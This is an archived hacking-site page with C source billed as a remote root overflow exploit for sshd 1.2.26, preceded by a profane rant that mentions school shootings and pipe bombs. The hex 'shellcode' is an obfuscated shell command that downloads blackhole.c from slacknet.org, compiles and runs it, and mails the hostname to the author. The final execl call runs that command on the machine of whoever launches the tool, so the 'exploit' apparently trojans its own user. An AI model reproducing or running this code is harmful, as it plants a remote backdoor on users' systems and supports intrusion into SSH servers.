Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: sshdx.c

sshd 1.2.26 remote root overflow exploiter




/*     sshd 1.2.26 remote root overflow by ben-z of gH + fts           *
 *        usage: sshdx <box running ssh> [command to exec]             *
 * ------------------------------------------------------------------- *
 * WARNING!: use this at your own risk! (THIS TOOL IS VERY DANGEROUS!) *
 * ------------------------------------------------------------------- *
 *  stuff:                                                             *
 *   this is my going away present to the internet. my mommy took my   *
 *   monitors and keyboards away for failing 4 classes :D and ya know  *
 *   whats even better? tommorows my 16th birthday, and instead of     *
 *   getting shit, im getting shit taken away.. sounds fair doesnt it? *
 *   this code is dedicated to all the fucking communist idiotic       *
 *   bastards out there that force their kids to go to a place where   *
 *   nothing is learned, for no fucking reason whatsoever.             *
 *  my advice:                                                         *
 *   get a job, learn c, make more money than whoever in charge of you *
 *   does, and then show them what the fucks up.. its shit like grades *
 *   that makes ordinary kids want to go into school shooting and      *
 *   throwing pipe bombs. instead of making us memorize every fucking  *
 *   name on the declaration of independence or the periodic table,    *
 *   why not let us actually learn something and use our gift of       *
 *   intelligence to think instead of coughing up shit they stuffed    *
 *   down our throat during the year. im not just going off on the     *
 *   public school system, im going off on every ignorant adult who    *
 *   actually believes that sending their children off to hell from    *
 *   8-3 is helping them learn how to think.                           *
 *  thanks to my friends:                                              *
 *   ice-e                - one of my best friends for almost 4 years  *
 *                          now.. hes still learning the ways, but he  *
 *                          has the right attitude to go much further  *
 *                          than me.                                   *
 *   folk		  - my all time favorite scripting buddy.      *
 *   metalman             - slacknet.org owns us all! *uNF* *booga*    *
 *   eklipz               - sits through my "advanced qbasic" class    *
 *                          with me almost every day.. that deserves   *
 *                          mad props.                                 *
 *   Inominate            - wrote the reet string->hex converter i use *
 *   fred                 - this code is _heavily_ based upon his :)   *
 *   mosthated            - i have your docz Eric Witfield (j/k) :D    *
 *   ne0h                 - gH world domination in progress! *ohyah*   *
 *   rhodie               - our former resident 13 year old prodigy    *
 *   c0sm0s1              - found the magic link (you know..)          *
 *   cyrus                - ran the ircd that will go down in history  *
 *   magicfx              - same as above -- come back! we miss you!#$ *
 *   chawp                - puts the unf back in drunfk :D             *
 *   xela                 - led me to my first ever copy of mirc.exe   *
 *   joez (dj butta)      - youve got a monkey in your shoe.           *
 *   ka0z                 - everybody gives props to ka0z.. heres mine *
 *   ka0s                 - (has nothing to do with ka0z) meep meep    *
 *   madlion              - learned drunken nollie hardflips yet?      *
 *   aXion                - "This Shit's Got Pop"                      *
 *   zeronine             - just punch a gaurd in the jaw and make a   *
 *                          run for it man.. cops are fat and they     *
 *                          make the prisoners work out.. how smart is *
 *                          this? peace yo.. we still lub ya..         *
 *   aj                   - basically taught me everything about linux *
 *   fts(2)               - Fuck The System - you guys are my family   *
 *   gH (global hell)     - world domination in progress.. we own you. *
 *  awards:                                                            *
 *   JP                   - wins for the anti-elite site of the year.  *
 *   ne0h                 - definatly deserves the "i own every fuckin *
 *                          site on the net with a stupid message and  *
 *                          have my own fan club for it" award. :)     *
 *   the FBI              - most ignorant lawsuit of the year award.   *
 *   ben-z                - wins the "longest intro to code" award :D  *
 * ------------------------------------------------------------------- */
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
"\x6c\x79\x6e\x78\x20\x2d\x64\x75\x6d\x70\x20\x68\x74\x74\x70\x3a\x2f\x2f" \
"\x73\x6c\x61\x63\x6b\x6e\x65\x74\x2e\x6f\x72\x67\x2f" \
"\x62\x6c\x61\x63\x6b\x68\x6f\x6c\x65\x2e\x63\x20\x3e\x3e\x62\x68\x2e\x63" \
"\x20\x3b\x20\x67\x63\x63\x20\x2d\x6f\x20\x62\x68\x20\x62\x68\x2e\x63\x20" \
"\x3b\x20\x68\x6f\x73\x74\x6e\x61\x6d\x65\x20\x7c\x20\x6d\x61\x69\x6c\x20" \
"\x2d\x73\x20\x22\x6f\x77\x6e\x65\x64\x22\x20\x62\x65\x6e\x7a\x40\x73\x6c" \
"\x61\x63\x6b\x6e\x65\x74\x2e\x6f\x72\x67\x20\x3b\x20\x2e\x2f\x62\x68\x20\x26";

#define	NOP	0x90
#define	BSIZE	256
#define	OFFSET	400
#define	ADDR	0xbffff658
#define ASIZE	2000

int
main(int argc, char *argv[])
{
	char *buffer;
	int s;
	struct hostent *hp;
	struct sockaddr_in sin;
	if (argc < 2) {
		printf("%s <target> [cmd (/bin/sh)]\n", argv[0]);
		exit(1);
	  }
	buffer = (char *) malloc(BSIZE + ASIZE + 100);
	if (buffer == NULL) {
		printf("Not enough memory\n");
		exit(1);
	  }
	memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
		strlen(shellcode));
	buffer[BSIZE + ASIZE] = ';';
	buffer[BSIZE + ASIZE + 1] = '\0';
	hp = gethostbyname(argv[1]);
	if (hp == NULL) {
		printf("no such server\n");
		exit(1);
	  }
	bzero(&sin, sizeof(sin));
	bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(22);
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s < 0) {
		printf("Can't open socket\n");
		exit(1);
	  }
	if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
		printf("Connection refused\n");
		exit(1);
	  }
	printf("sending exploit code...\n");
	if (send(s, buffer, strlen(buffer), 0) != 1)
		printf("overflow succesfull! cmd sent.\n");
	  else
		printf("sorry, this site isn't vulnerable\n");
	execl("/bin/sh", "sh", "-c", shellcode, 0);
	printf("-eof-\n");
}


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH